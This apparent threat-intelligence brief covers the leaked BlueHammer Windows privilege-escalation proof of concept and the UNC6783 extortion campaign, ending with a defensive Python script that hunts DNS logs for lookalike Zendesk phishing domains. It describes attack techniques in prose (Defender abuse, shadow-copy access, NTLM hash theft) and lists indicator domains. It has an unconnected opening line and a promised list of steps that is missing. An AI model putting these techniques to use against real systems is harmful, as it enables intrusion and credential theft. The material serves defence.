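The Run-key rule keys on where the referenced executable lives rather than on a value name, since both campaigns rotate file names while the need to launch from a user-writable path stays constant; the OneDrive entry in the sample shows a legitimate Run value passing through untouched.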
SUMMARY
A proof of concept exploit named BlueHammer has been released for an unpatched Windows local privilege escalation vulnerability. It allows attackers with local access to escalate privileges by exploiting legitimate Windows features, prompting organizations to monitor for related suspicious activities until a patch is available.
Category
Zero-day
Industry
Multiple
Sources
https://www.helpnetsecurity.com/2026/04/08/bluehammer-windows-zero-day-exploit-leaked/
https://www.bleepingcomputer.com/news/security/disgruntled-researcher-leaks-bluehammer-windows-zero-day-exploit/
https://infosec.exchange/@wdormann/116358064691025711
https://deadeclipse666.blogspot.com/2026/04/public-disclosure.html
Internal OSec Collection
ANALYST COMMENTS
A PoC called BlueHammer targets an unpatched Windows local privilege escalation vulnerability and has been refined by researchers to work across Windows 10, 11, and Server systems. The exploit abuses Microsoft Defender and other legitimate features to create a Volume Shadow Copy, access sensitive registry data, extract NTLM hashes, and gain SYSTEM level privileges through a temporary service. This technique chains multiple legitimate Windows functions in an unintended way and does not require authentication. Organizations should monitor for indicators such as Volume Shadow Copy activity and unexpected password changes on local administrator accounts until a patch is available.
Testing in our lab showed the PoC did not fully execute. Current detections by Microsoft Defender are available for this PoC; however, these are unlikely to address the root cause of the vulnerability at this time. This may lead to variants created by threat actors using the currently released code in order to create a more stable and consistent weaponized version of the exploit. Such variants will also likely evade signature-based protection from MS Defender, as the signature would not account for changes made to the current PoC code.
The bug is primarily a TOCTOU based vulnerability that performs the following actions:
Fully updated MS Defender versions are likely not vulnerable, due to the need to unpack a working Defender update within the attack chain.
ACTIONABLE GUIDANCE
Organizations should monitor for behavioral indicators of BlueHammer activity until a patch is released. This includes Volume Shadow Copy enumeration and unexpected password changes to local administrator accounts. Unapproved Defender update downloads should also be monitored, especially those triggered through the Proc42 ServerMpUpdateEngineSignature API call.
SUMMARY
A new extortion group named UNC6783 by researchers is targeting high-value organizations through phishing and social engineering. It focuses on compromising call centers and BPOs to steal credentials and gain access to corporate networks, leading to potential data theft and ransom demands via Proton Mail.
Category
Ransomware, Extortion
Industry
Multiple
Sources
https://www.theregister.com/2026/04/09/several_dozen_highvalue_corporations_targeted/
https://www.securityweek.com/google-warns-of-new-campaign-targeting-bpos-to-steal-corporate-data/
Internal OSec Collection
ANALYST COMMENTS
A new extortion group identified as Mr.Raccoon or UNC6783 has targeted high-value organizations through social engineering, including phishing and exploiting helpdesk personnel, with a focus on compromising call centers and BPOs connected to larger firms. The attackers gain access by directing employees to spoofed Okta login pages in live chats or by tricking them into installing malware through fake security updates. Once inside, they use stolen credentials and phishing kits that capture clipboard data to bypass MFA and maintain access. They exfiltrate data and issue ransom demands through Proton Mail. These methods align with groups such as Scattered Spider and ShinyHunters, suggesting a coordinated approach to corporate extortion.
Our research indicates the actor maintains a low profile and may have compromised Adobe, though no formal disclosure or k filing has confirmed the breach. However, multiple sources suggest the activity is likely credible. Potential downstream impact may affect customers who submitted Zendesk tickets to the compromised organization; however, the full scope of risk remains unclear. Known domains tied to the actor show infrastructure staging beginning around November 19, 2025, with a notable increase in activity over the past month. Current patterns suggest a focus on large-scale targets, particularly BPOs supporting major brands and organizations.
Domain string in phishing kit is primarily <company org>.zendesk-support[## or ###].com
First instance on urlscan goes back 5 months, with domain created November 19th, 2025 - *.zendesk-support823[.]com
# First domain orgs mentioned in subdomains
justeat
justeattakeaway
ACTIONABLE GUIDANCE
The threat actor uses identity-based techniques to access Zendesk environments and exfiltrate ticket information, likely to support downstream targeting and enable further identity-based attacks against customers. Customers that have submitted a Zendesk ticket to Adobe in the last 30 days may be at risk, especially if the ticket included sensitive data such as credentials, secrets, or environment and system details. If compromise is suspected, organizations should hunt for domains following the pattern <org-name>.zendesk-support<number>.com, where the number is two to three digits. Policies for external contractors handling user roles, passwords, or other identity-related changes should be reviewed, with validation controls enforced to prevent unauthorized access and abuse. Messages from an unknown third party, received through email or voice communication and directing the user to non-official Zendesk-related domains or unfamiliar Okta URLs, should be regarded as suspicious. Organizations referenced above should monitor contractor and user behavior for suspicious activity. If they submitted tickets within the last 30 days, they should verify that no sensitive data was exposed through Zendesk submissions.
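As an added example (not code from the brief, from Google's research or from OSec), the Python below implements the domain hunt described above over DNS query logs: it matches the <org-name>.zendesk-support<two-or-three digits>.com pattern, leaves genuine <tenant>.zendesk.com hosts alone, and groups the lookalikes by the impersonated organization together with the internal clients that resolved them, so the output names both which brands are being spoofed and which users may have interacted with the kit. The DNS log layout and the sample lines are constructed assumptions; the pattern and the justeat/justeattakeaway names are from the brief.

```python
import re
from collections import defaultdict
from typing import Dict, List

# Pattern from the brief: <org-name>.zendesk-support<2-3 digits>.com (trailing dot tolerated for DNS logs).
LOOKALIKE_RE = re.compile(r"^(?P<org>[a-z0-9-]+)\.zendesk-support(?P<num>\d{2,3})\.com\.?$", re.I)
# Genuine Zendesk tenant hosts look like <tenant>.zendesk.com and are never flagged.
LEGIT_RE = re.compile(r"^[a-z0-9-]+\.zendesk\.com\.?$", re.I)


def classify(qname: str) -> str:
    """'legitimate', 'lookalike' or 'other' for one queried name."""
    if LEGIT_RE.match(qname):
        return "legitimate"
    if LOOKALIKE_RE.match(qname):
        return "lookalike"
    return "other"


def hunt(lines: List[str]) -> Dict[str, Dict[str, list]]:
    """Group lookalike domains and the clients that queried them by impersonated org.

    Input lines are constructed '<ts> <client_ip> <qname>' records.
    """
    by_org: Dict[str, Dict[str, set]] = defaultdict(lambda: {"domains": set(), "clients": set()})
    for line in lines:
        parts = line.split()
        if len(parts) != 3:
            continue
        client, qname = parts[1], parts[2]
        m = LOOKALIKE_RE.match(qname)
        if m is None:
            continue
        org = m.group("org").lower()
        by_org[org]["domains"].add(qname.rstrip(".").lower())
        by_org[org]["clients"].add(client)
    # Sorted lists make the result stable for reporting and comparison.
    return {org: {k: sorted(v) for k, v in entry.items()} for org, entry in by_org.items()}


# Constructed DNS log lines (private-range clients), not real telemetry.
SAMPLE_DNS = [
    "2026-04-09T08:00:00Z 10.0.0.5 justeat.zendesk-support823.com.",
    "2026-04-09T08:00:01Z 10.0.0.5 justeattakeaway.zendesk-support823.com.",
    "2026-04-09T08:01:00Z 10.0.0.9 acme.zendesk-support42.com",
    "2026-04-09T08:01:30Z 10.0.0.12 acme.zendesk-support42.com",
    "2026-04-09T08:02:00Z 10.0.0.9 acme.zendesk.com",
    "2026-04-09T08:03:00Z 10.0.0.7 support.example.com",
    "2026-04-09T08:04:00Z 10.0.0.7 acme.zendesk-support9999.com",
]

if __name__ == "__main__":
    for org, entry in hunt(SAMPLE_DNS).items():
        print(org, entry)
```

The four-digit variant in the last sample line is deliberately left unmatched so the strict rule reflects the brief's stated pattern; widen the digit range only if you have evidence of the actor changing it.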
The full Intelligence Desk brief includes exhaustive IOC lists, YARA detection rules, detailed remediation playbooks, and OSec's original threat research. Delivered weekly to our partners and clients.